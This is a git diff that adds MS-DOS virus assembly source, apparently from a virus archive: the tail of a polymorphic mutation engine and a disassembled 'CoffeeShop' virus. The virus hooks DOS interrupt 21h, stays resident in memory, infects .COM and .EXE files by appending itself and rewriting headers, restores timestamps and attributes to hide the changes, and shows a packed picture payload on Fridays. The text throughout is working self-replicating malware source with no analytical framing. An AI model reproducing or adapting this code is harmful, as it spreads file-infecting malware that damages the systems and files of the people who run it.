+;****************************************************************************
+
+no_sp: push ax
+ and al,7
+ cmp al,4
+ pop ax
+ jnz no_sp_ret
+ and al,0FBh
+no_sp_ret: ret
+
+
+;****************************************************************************
+;* don't fuck with SP! 
+;****************************************************************************
+
+no_sp2: push ax
+ and ah,38
+ cmp ah,20
+ pop ax
+ jnz no_sp2_ret
+ xor ah,20
+no_sp2_ret: ret
+
+
+;****************************************************************************
+;* don't use [BP+..]
+;****************************************************************************
+
+no_bp: test ah,4
+ jnz no_bp2
+ and ah,0FDh
+ ret
+
+no_bp2: push ax
+ and ah,7
+ cmp ah,6
+ pop ax
+ jnz no_bp_ret
+ or ah,1
+no_bp_ret: ret
+
+
+;****************************************************************************
+;* write byte for JMP/CALL and fill with random bullshit
+;****************************************************************************
+
+fill_bullshit: push cx
+ xchg ax,cx
+bull_lup: call rnd_get
+ stosb
+ loop bull_lup
+ pop cx
+ ret
+
+
+;****************************************************************************
+;* random number generator (stolen from 'Bomber')
+;****************************************************************************
+
+rnd_init: push cx
+ call rnd_init0 ;init
+ and ax,000F
+ inc ax
+ xchg ax,cx
+random_lup: call rnd_get ;call random routine a few
+ loop random_lup ; times to 'warm up'
+ pop cx
+ ret
+
+rnd_init0: push dx ;initialize generator
+ push cx
+ mov ah,2C
+ int 21
+ in al,40
+ mov ah,al
+ in al,40
+ xor ax,cx
+ xor dx,ax
+ jmp short move_rnd
+
+rnd_get: push dx ;calculate a random number
+ push cx
+ push bx
+ mov ax,0 ;will be: mov ax,xxxx
+ mov dx,0 ; and mov dx,xxxx
+ mov cx,7
+rnd_lup: shl ax,1
+ rcl dx,1
+ mov bl,al
+ xor bl,dh
+ jns rnd_l2
+ inc al
+rnd_l2: loop rnd_lup
+ pop bx
+
+move_rnd: mov word ptr ds:[rnd_get+4],ax
+ mov word ptr ds:[rnd_get+7],dx
+ mov al,dl
+ pop cx
+ pop dx
+ ret
+
+
+;****************************************************************************
+;* tables for engine
+;****************************************************************************
+
+ ; AX AL AH (BX) BL BH CX CL CH
+mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 
0B3, 0B7, 0, 0B9, 0B1, 0B5 + + ; nop clc stc cmc cli cld incbp decbp +nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh + + ; or and xchg mov +nop_data16 db 8, 20, 84, 88 + + ; bl/bh, bx, si di +dir_change db 07, 07, 04, 05 +ind_change db 03, 03, 06, 07 + + + ; xor xor add sub +how_mode db 30, 30, 00, 28 + + ; ? add xor or +add_mode db 0, 0C8, 0F0, 0C0 + + +;**************************************************************************** +;* text + buffer +;**************************************************************************** + + db ' Amsterdam = COFFEESHOP! ' + +buffer db 0CDh, 20 ;original code of dummy program + db (BUFLEN-2) dup (?) + + +;**************************************************************************** +;* the (packed) picture routine +;**************************************************************************** + +beeld db 0BFh, 0A1h, 015h, 090h, 090h, 090h, 090h, 090h + db 090h, 090h, 090h, 0BEh, 0F9h, 003h, 0B9h, 06Bh + db 001h, 0FDh, 0F3h, 0A5h, 0FCh, 08Bh, 0F7h, 0BFh + db 000h, 001h, 0ADh, 0ADh, 08Bh, 0E8h, 0B2h, 010h + db 0E9h, 036h, 014h, 04Fh, 08Fh, 07Fh, 0FCh, 0B4h + db 00Fh, 0CDh, 010h, 0B4h, 000h, 050h, 0FBh, 0B7h + db 0B0h, 03Ch, 007h, 074h, 0FFh, 0FFh, 00Ah, 03Ch + db 004h, 073h, 028h, 0B7h, 0B8h, 03Ch, 002h, 072h + db 022h, 08Eh, 0C3h, 0BEh, 040h, 001h, 0FFh, 0FFh + db 0B0h, 019h, 057h, 0B1h, 050h, 0F3h, 0A5h, 05Fh + db 081h, 0C7h, 0A0h, 000h, 0FEh, 0C8h, 075h, 0F2h + db 003h, 08Fh, 0B8h, 007h, 00Eh, 0D6h, 0FBh, 00Ch + db 0CDh, 021h, 058h, 0F8h, 063h, 0A7h, 0CBh, 020h + db 002h, 0FEh, 020h, 000h, 0FAh, 0EBh, 0B0h, 0FCh + db 0F8h, 003h, 077h, 0F0h, 0E0h, 0D0h, 041h, 00Fh + db 0C0h, 02Fh, 007h, 01Dh, 080h, 06Fh, 0BAh, 0DCh + db 0E1h, 034h, 0DBh, 00Ch, 0F8h, 0F0h, 00Eh, 0DFh + db 0FEh, 0F4h, 0F8h, 0BBh, 0AEh, 0F8h, 0E4h, 003h + db 084h, 0E0h, 0FCh, 0EBh, 0B0h, 0E6h, 0EAh, 0A3h + db 083h, 0DAh, 0AAh, 00Eh, 0DCh, 009h, 0BAh, 0C8h + db 001h, 03Ah, 0F0h, 050h, 007h, 0A2h, 0E8h, 0E0h + db 0ACh, 005h, 0DBh, 00Eh, 077h, 00Fh, 0F8h, 0DCh + db 
0F6h, 0BAh, 0AEh, 0F0h, 0F6h, 0EBh, 03Ah, 0F0h + db 0F4h, 0E0h, 040h, 017h, 0FAh, 0ECh, 01Dh, 072h + db 0DFh, 0DAh, 0D2h, 074h, 0F8h, 0BAh, 0DDh, 020h + db 01Dh, 074h, 0DEh, 020h, 0AAh, 007h, 0BAh, 0D8h + db 061h, 0F8h, 047h, 087h, 0F8h, 0E8h, 0E1h, 0E8h + db 0F8h, 092h, 0F4h, 000h, 01Dh, 060h, 0D8h, 0E8h + db 009h, 0DCh, 0FEh, 009h, 0F8h, 0B0h, 023h, 0F8h + db 05Ch, 0D7h, 0FCh, 0F8h, 0FCh, 0E8h, 001h, 03Bh + db 0F4h, 0ECh, 080h, 0D2h, 01Dh, 0BEh, 0BAh, 05Ch + db 020h, 07Ch, 003h, 075h, 060h, 0CAh, 020h, 00Eh + db 0B2h, 0D8h, 081h, 0F0h, 03Bh, 040h, 092h, 0D7h + db 0B5h, 0CEh, 0F8h, 0DCh, 060h, 0A7h, 041h, 0DEh + db 060h, 002h, 0B5h, 0BEh, 03Ch, 020h, 00Fh, 07Bh + db 022h, 065h, 007h, 01Dh, 060h, 06Eh, 084h, 0CCh + db 0DFh, 00Dh, 020h, 0C0h, 0B3h, 020h, 02Fh, 060h + db 041h, 01Eh, 06Ah, 0DEh, 07Eh, 00Ah, 042h, 0E0h + db 009h, 0E4h, 0C0h, 075h, 030h, 060h, 00Bh, 0DFh + db 01Ch, 0F4h, 0E4h, 042h, 04Fh, 05Eh, 05Eh, 041h + db 09Ah, 022h, 006h, 02Bh, 01Ch, 080h, 060h, 03Eh + db 084h, 057h, 005h, 0CAh, 046h, 0A4h, 0D0h, 07Bh + db 053h, 07Ah, 097h, 005h, 015h, 0C2h, 004h, 020h + db 01Dh, 054h, 060h, 001h, 0C8h, 051h, 041h, 0E8h + db 0DCh, 006h, 054h, 0BEh, 077h, 0D8h, 02Dh, 078h + db 07Ah, 050h, 055h, 001h, 004h, 020h, 05Dh, 007h + db 076h, 02Eh, 0AEh, 03Ah, 0C6h, 062h, 0E8h, 0A0h + db 055h, 05Eh, 009h, 0A2h, 002h, 0C0h, 020h, 057h + db 084h, 0C6h, 0D0h, 004h, 01Dh, 02Ah, 05Dh, 05Eh + db 0D6h, 016h, 017h, 080h, 098h, 0A4h, 040h, 003h + db 050h, 0EAh, 0ACh, 05Dh, 005h, 062h, 0C4h, 01Dh + db 070h, 059h, 05Eh, 0C4h, 067h, 005h, 082h, 0DCh + db 020h, 002h, 005h, 060h, 020h, 0E4h, 090h, 062h + db 019h, 0D4h, 094h, 065h, 0ECh, 00Eh, 069h, 05Eh + db 0CFh, 007h, 0A0h, 070h, 020h, 0B0h, 0A2h, 0B2h + db 083h, 00Ah, 062h, 069h, 0CCh, 03Bh, 060h, 05Eh + db 0D5h, 002h, 0BEh, 080h, 070h, 090h, 062h, 004h + db 072h, 083h, 055h, 0FEh, 06Eh, 010h, 041h, 040h + db 041h, 0AEh, 0FEh, 0CEh, 075h, 034h, 09Eh, 0FEh + db 002h, 071h, 05Ch, 0BAh, 0AAh, 0E6h, 0CCh, 018h + db 072h, 0C0h, 062h, 040h, 
00Eh, 06Ch, 07Bh, 047h
+ db 0F2h, 0BCh, 005h, 015h, 028h, 050h, 026h, 0E1h
+ db 070h, 0FEh, 052h, 05Fh, 068h, 009h, 0FEh, 0BEh
+ db 040h, 010h, 02Ah, 0F2h, 0AEh, 0E0h, 03Ah, 070h
+ db 0FEh, 0FCh, 06Ah, 04Ah, 050h, 0DEh, 061h, 0ACh
+ db 061h, 0C7h, 050h, 00Eh, 001h, 03Eh, 072h, 060h
+ db 048h, 08Eh, 00Ah, 06Ah, 096h, 03Ah, 0E8h, 002h
+ db 066h, 058h, 084h, 0B0h, 045h, 0B4h, 007h, 020h
+ db 05Ah, 0EAh, 0E9h, 0C0h, 044h, 02Dh, 060h, 0E8h
+ db 093h, 0A0h, 09Eh, 073h, 048h, 050h, 0C6h, 0FFh
+ db 0F0h, 041h, 0D3h, 0FFh, 060h, 040h, 001h, 0FFh
+ db 0D1h, 0EDh, 0FEh, 0CAh, 075h, 005h, 0ADh, 08Bh
+ db 0E8h, 0B2h, 010h, 0C3h, 0E8h, 0F1h, 0FFh, 0D0h
+ db 0D7h, 0E8h, 0ECh, 0FFh, 072h, 014h, 0B6h, 002h
+ db 0B1h, 003h, 0E8h, 0E3h, 0FFh, 072h, 009h, 0E8h
+ db 0DEh, 0FFh, 0D0h, 0D7h, 0D0h, 0E6h, 0E2h, 0F2h
+ db 02Ah, 0FEh, 0B6h, 002h, 0B1h, 004h, 0FEh, 0C6h
+ db 0E8h, 0CDh, 0FFh, 072h, 010h, 0E2h, 0F7h, 0E8h
+ db 0C6h, 0FFh, 073h, 00Dh, 0FEh, 0C6h, 0E8h, 0BFh
+ db 0FFh, 073h, 002h, 0FEh, 0C6h, 08Ah, 0CEh, 0EBh
+ db 02Ah, 0E8h, 0B4h, 0FFh, 072h, 010h, 0B1h, 003h
+ db 0B6h, 000h, 0E8h, 0ABh, 0FFh, 0D0h, 0D6h, 0E2h
+ db 0F9h, 080h, 0C6h, 009h, 0EBh, 0E7h, 0ACh, 08Ah
+ db 0C8h, 083h, 0C1h, 011h, 0EBh, 00Dh, 0B1h, 003h
+ db 0E8h, 095h, 0FFh, 0D0h, 0D7h, 0E2h, 0F9h, 0FEh
+ db 0CFh, 0B1h, 002h, 026h, 08Ah, 001h, 0AAh, 0E2h
+ db 0FAh, 0E8h, 084h, 0FFh, 073h, 003h, 0A4h, 0EBh
+ db 0F8h, 0E8h, 07Ch, 0FFh, 0ACh, 0B7h, 0FFh, 08Ah
+ db 0D8h, 072h, 081h, 0E8h, 072h, 0FFh, 072h, 0D6h
+ db 03Ah, 0FBh, 075h, 0DDh, 033h, 0EDh, 033h, 0FFh
+ db 033h, 0F6h, 033h, 0D2h, 033h, 0DBh, 033h, 0C0h
+ db 0E9h, 07Dh, 0EBh
+
+last:
+
+_TEXT ends
+ end first
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.coffshp1.asm b/MSDOS/Virus.MSDOS.Unknown.coffshp1.asm
new file mode 100644
index 00000000..b0984d55
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.coffshp1.asm
@@ -0,0 +1,825 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 COFFSHP1 圹 +;圹 圹 +;圹 Created: 23-Jun-92 圹 +;圹 Passes: 5 Analysis Options on: AW 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_1e equ 0F8h +data_2e equ 0FAh +data_3e equ 43Bh +data_4e equ 0F4h +data_5e equ 0F8h +data_6e equ 0FCh +data_15e equ 15A1h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +coffshp1 proc far + +start: + jmp loc_2 + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+di],ah + inc ax + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + int 20h ; DOS program terminate + db 27 dup (0) +loc_2: + call sub_2 + +coffshp1 endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + pop si + mov di,100h + sub si,20h + push ax + push ds + push es + push di + push si + cld ; Clear direction + mov ah,30h ; '0' + int 21h ; DOS Services ah=function 30h + ; get DOS version number ax + xchg ah,al + cmp ax,30Ah + jb loc_3 ; Jump if below + mov ax,33DAh + int 21h ; ??INT Non-standard interrupt + cmp ah,0A5h + je loc_3 ; Jump if equal + mov ax,es + dec ax + mov ds,ax + xor bx,bx ; Zero register + cmp byte ptr [bx],5Ah ; 'Z' + jne loc_3 ; Jump if not equal + mov ax,[bx+3] + sub ax,72h + jc loc_3 ; Jump if carry Set + mov [bx+3],ax + sub word ptr [bx+12h],72h + mov es,[bx+12h] + push cs + pop ds + mov cx,620h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + push es + pop ds + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_1e,bx + mov ds:data_2e,es +;* mov dx,offset loc_1 + db 0BAh, 01h, 02h + mov ax,2521h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dh=month + ; dl=day, al=day-of-week 0=SUN + cmp 
al,5 + jne loc_3 ; Jump if not equal + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + or dh,dh ; Zero ? + jnz loc_3 ; Jump if not zero + pop ax + push ax + call sub_3 +loc_3: + pop si + pop di + pop es + pop ds + pop ax + cmp byte ptr cs:[si+1Ch],0 + je loc_4 ; Jump if equal + mov bx,ds + add bx,10h + mov cx,bx + add bx,cs:[si+0Eh] + cli ; Disable interrupts + mov ss,bx + mov sp,cs:[si+10h] + sti ; Enable interrupts + add cx,cs:[si+16h] + push cx + push word ptr cs:[si+14h] + retf ; Return far +loc_4: + push di + mov cx,1Ch + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near + mov bx,ax + add bx,152h + push cs + push bx + add ax,62Fh + and ax,0FFF0h + mov di,ax + mov si,data_3e + mov cx,2E5h + push cs + pop es + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov cl,4 + shr ax,cl ; Shift w/zeros fill + mov dx,cs + add ax,dx + sub ax,10h + mov ds,ax + mov es,ax + push ax + mov ax,100h + push ax + retf ; Return far +sub_3 endp + + and [bp+di+6Fh],al + db 'ffeeShop ' + db 0B0h, 03h,0CFh, 9Ch, 3Dh,0DAh + db 33h, 75h, 05h,0B8h, 01h,0A5h + db 9Dh,0CFh + db 06h, 1Eh, 56h, 57h, 52h, 51h + db 53h, 50h, 3Dh, 00h, 4Bh, 74h + db 0Ch, 3Dh, 00h + db 6Ch, 75h, 0Ah + db 0F6h,0C3h, 03h, 75h, 05h, 8Bh + db 0D7h +loc_7: + call sub_4 +loc_8: + pop ax + pop bx + pop cx + pop dx + pop di + pop si + pop ds + pop es + popf ; Pop flags + jmp dword ptr cs:data_5e + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + cld ; Clear direction + push cs + pop es + mov si,dx + xor di,di ; Zero register + mov cx,80h + +locloop_9: + lodsb ; String [si] to al + cmp al,0 + je loc_12 ; Jump if equal + cmp al,61h ; 'a' + jb loc_10 ; Jump if below + cmp al,7Ah ; 'z' + ja loc_10 ; Jump if above + xor al,20h ; ' ' +loc_10: + stosb ; Store al to es:[di] + loop 
locloop_9 ; Loop if cx > 0 + + +loc_ret_11: + retn +loc_12: + stosb ; Store al to es:[di] + lea si,[di-5] ; Load effective addr + push cs + pop ds + lodsw ; String [si] to ax + cmp ax,452Eh + jne loc_13 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,4558h + jmp short loc_14 +loc_13: + cmp ax,432Eh + jne loc_ret_11 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,4D4Fh +loc_14: + jne loc_ret_11 ; Jump if not equal + std ; Set direction flag + mov cx,si + inc cx + +locloop_15: + lodsb ; String [si] to al + cmp al,3Ah ; ':' + je loc_16 ; Jump if equal + cmp al,5Ch ; '\' + je loc_16 ; Jump if equal + loop locloop_15 ; Loop if cx > 0 + + dec si +loc_16: + cld ; Clear direction + lodsw ; String [si] to ax + lodsw ; String [si] to ax + mov di,3BEh + mov cl,0Ch + repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax + jz loc_ret_11 ; Jump if zero + mov ax,3300h + int 21h ; DOS Services ah=function 33h + ; get ctrl-break flag in dl + push dx + cwd ; Word to double word + inc ax + push ax + int 21h ; DOS Services ah=function 33h + ; set ctrl-break flag dl=off/on + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + push es + push bx + push cs + pop ds + mov dx,offset int_24h_entry + mov ah,25h ; '%' + push ax + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,4300h + cwd ; Word to double word + int 21h ; DOS Services ah=function 43h + ; get attrb cx, filename @ds:dx + push cx + xor cx,cx ; Zero register + mov ax,4301h + push ax + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + jc loc_17 ; Jump if carry Set + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_18 ; Jump if carry=0 +loc_17: + jmp loc_24 +loc_18: + xchg ax,bx + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push dx + push cx + mov cx,1Ch + mov si,100h + mov dx,si + call sub_7 + jc 
loc_19 ; Jump if carry Set + mov ax,4202h + xor cx,cx ; Zero register + cwd ; Word to double word + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov di,data_4e + mov [di],ax + mov [di+2],dx + cmp word ptr [si+12h],4021h + je loc_19 ; Jump if equal + cmp word ptr [si],5A4Dh + je loc_20 ; Jump if equal + mov byte ptr [si+1Ch],0 + test byte ptr [si],80h + jz loc_19 ; Jump if zero + cmp word ptr [di],0D000h + jae loc_19 ; Jump if above or = + cmp word ptr [di],7D0h + jb loc_19 ; Jump if below + call sub_10 + jnz loc_19 ; Jump if not zero + mov byte ptr [si],0E9h + mov ax,[di] + add ax,1Ah + mov [si+1],ax + jmp short loc_22 +loc_19: + jmp loc_23 +loc_20: + mov byte ptr [si+1Ch],1 + cmp word ptr [si+18h],40h + jb loc_21 ; Jump if below + mov ax,3Ch + cwd ; Word to double word + call sub_6 + jc loc_23 ; Jump if carry Set + mov ax,[si-4] + mov dx,[si-2] + call sub_6 + jc loc_23 ; Jump if carry Set + cmp byte ptr [si-3],45h ; 'E' + je loc_23 ; Jump if equal +loc_21: + call sub_9 + cmp [si+4],ax + jne loc_23 ; Jump if not equal + cmp [si+2],dx + jne loc_23 ; Jump if not equal + cmp word ptr [si+0Ch],0 + je loc_23 ; Jump if equal + cmp word ptr [si+1Ah],0 + jne loc_23 ; Jump if not equal + call sub_10 + jnz loc_23 ; Jump if not zero + call sub_8 + mov [si+4],ax + mov [si+2],dx + call sub_11 + mov cx,10h + div cx ; ax,dx rem=dx:ax/reg + sub ax,[si+8] + dec ax + add dx,2Dh + mov [si+16h],ax + mov [si+0Eh],ax + mov [si+14h],dx + mov word ptr [si+10h],17E0h + lea di,[si+0Ah] ; Load effective addr + call sub_5 + lea di,[si+0Ch] ; Load effective addr + call sub_5 +loc_22: + call sub_12 + mov word ptr [si+12h],4021h + mov cx,1Ch + mov dx,si + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_23: + pop cx + pop dx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + mov ah,3Eh ; '>' + int 21h ; 
DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_24: + pop ax + pop cx + cwd ; Word to double word + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + pop ax + pop dx + pop ds + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ax + pop dx + int 21h ; DOS Services ah=function 33h + ; set ctrl-break flag dl=off/on + retn +sub_4 endp + + inc bx + dec di + push bx + inc bx + inc bx + dec sp + push si + push bx + dec si + inc bp + dec ax + push sp + push sp + inc dx + push si + dec cx + push dx + inc cx + inc si + inc bp + dec bp + push sp + inc dx + push dx + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_5 proc near + mov ax,[di] + sub ax,62h + jc loc_25 ; Jump if carry Set + cmp ax,14Bh + jae loc_26 ; Jump if above or = +loc_25: + mov ax,14Bh +loc_26: + mov [di],ax + retn +sub_5 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_6 proc near + call sub_13 + mov dx,data_6e + mov cx,4 + +;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 + +sub_7: + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + retn +sub_6 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_8 proc near + call sub_11 + add ax,620h + adc dx,0 + jmp short loc_27 + +;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 + +sub_9: + call sub_11 +loc_27: + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + or dx,dx ; Zero ? 
+ jz loc_ret_28 ; Jump if zero + inc ax + +loc_ret_28: + retn +sub_8 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_10 proc near + call sub_11 + call sub_13 + mov cx,620h + mov dx,si + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + cmp ax,cx + retn +sub_10 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_11 proc near + mov ax,[di] + mov dx,[di+2] + retn +sub_11 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_12 proc near + xor ax,ax ; Zero register + cwd ; Word to double word + +;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 + +sub_13: + xchg cx,dx + xchg ax,dx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn +sub_12 endp + + and [di+4Bh],cl + and [bx],ah + cmp [bp+si],si + and ds:data_15e[bx],bh + cmp di,sp + jb loc_29 ; Jump if below + mov ah,4Ch ; 'L' + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code +loc_29: + mov si,403h + mov cx,170h + std ; Set direction flag + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + cld ; Clear direction + mov si,di + mov di,100h + lodsw ; String [si] to ax + lodsw ; String [si] to ax + mov bp,ax + mov dl,10h + jmp $+1439h + adc ax,7FDFh + cld ; Clear direction + mov ah,0Fh + int 10h ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + ; ah=columns on screen + mov ah,0 + push ax + sti ; Enable interrupts + mov bh,0B0h + cmp al,7 +;* je loc_31 ; Jump if equal + db 74h,0FFh + dec word ptr [bp+si] + cmp al,4 + jae $+2Ah ; Jump if above or = + mov bh,0B8h + cmp al,2 + jb $+24h ; Jump if below + mov es,bx + mov si,140h + db 0FFh,0FFh,0B0h, 19h, 57h,0B1h + db 50h,0F3h,0A5h, 5Fh, 81h,0C7h + db 0A0h, 00h,0FEh,0C8h, 75h,0F2h + db 03h, 8Fh,0B8h, 07h, 0Eh,0D6h + db 
0FBh, 0Ch,0CDh, 21h, 58h,0F8h + db 63h,0A7h,0CBh, 20h, 02h,0FEh + db 20h, 00h,0FAh,0EBh,0B0h,0FCh + db 0F8h, 03h, 77h,0F0h,0E0h,0D0h + db 41h, 0Fh,0C0h, 2Fh, 07h, 1Dh + db 80h, 6Fh,0BAh,0DCh,0E1h, 34h + db 0DBh, 0Ch,0F8h,0F0h, 0Eh,0DFh + db 0FEh,0F4h,0F8h,0BBh,0AEh,0F8h + db 0E4h, 03h, 84h,0E0h,0FCh,0EBh + db 0B0h,0E6h,0EAh,0A3h, 83h,0DAh + db 0AAh, 0Eh,0DCh, 09h,0BAh,0C8h + db 01h, 3Ah,0F0h, 50h, 07h,0A2h + db 0E8h,0E0h,0ACh, 05h,0DBh, 0Eh + db 77h, 0Fh,0F8h,0DCh,0F6h,0BAh + db 0AEh,0F0h,0F6h,0EBh, 3Ah,0F0h + db 0F4h,0E0h, 40h, 17h,0FAh +loc_33: + in al,dx ; port 10h ??I/O Non-standard + sbb ax,0DF72h + esc 2,dl ; coprocessor escape + jz loc_33 ; Jump if zero + mov dx,20DDh + sbb ax,0DE74h + and [bp+si-45F9h],ch + esc 0,[bx+di-8] ; coprocessor escape + inc di + xchg di,ax + call $-171Ch + clc ; Clear carry flag + xchg ax,dx + hlt ; Halt processor + add [di],bl + db 60h,0D8h,0E8h, 09h,0DCh,0FEh + db 09h,0F8h,0B0h, 23h,0F8h, 5Ch + db 0D7h,0FCh,0F8h,0FCh,0E8h, 01h + db 3Bh,0F4h,0ECh, 80h,0D2h, 1Dh + db 0BEh,0BAh, 5Ch, 20h, 7Ch, 03h + db 75h, 60h,0CAh, 20h, 0Eh,0B2h + db 0D8h, 81h,0F0h, 3Bh, 40h, 92h + db 0D7h,0B5h,0CEh,0F8h,0DCh, 60h + db 0A7h, 41h,0DEh, 60h, 02h,0B5h + db 0BEh, 3Ch, 20h, 0Fh, 7Bh, 22h + db 65h, 07h, 15h, 60h, 6Eh, 42h + db 68h,0B8h, 20h,0FEh,0FCh,0AEh + db 23h,0FCh,0E2h, 7Fh, 07h,0C0h + db 0B3h, 20h, 2Fh, 60h, 79h, 28h + db 6Ah,0DEh, 7Eh,0E0h, 08h,0D5h + db 09h,0E4h,0C0h, 60h,0C1h, 70h + db 0Bh,0DFh,0E4h, 42h,0D0h, 7Bh + db 4Fh, 5Eh, 9Ah, 05h,0ADh + db 22h + db 06h, 80h, 70h, 10h, 60h, 3Eh + db 05h,0CAh, 5Eh, 41h, 46h,0A4h + db 53h,0EFh, 15h + db 7Ah + db 97h,0C2h, 54h, 74h, 04h, 20h + db 60h, 50h, 45h, 01h,0C8h,0E8h + db 0DCh, 05h,0F9h, 06h, 54h,0D8h + db 0DEh, 41h, 2Dh, 78h, 7Ah, 01h + db 55h, 75h, 04h, 20h, 76h, 1Dh + db 0B8h, 2Eh,0EAh,0A0h,0C6h, 62h + db 55h, 83h, 8Ah, 5Eh, 09h,0C0h + db 0Ah, 5Ch, 20h,0C6h, 11h, 12h + db 0D0h, 2Ah, 74h, 58h, 5Dh, 5Eh + db 17h, 5Bh, 60h, 80h, 92h, 0Eh + db 40h,0EAh, 40h, 75h,0ACh, 62h + db 15h, 74h,0C4h, 59h, 
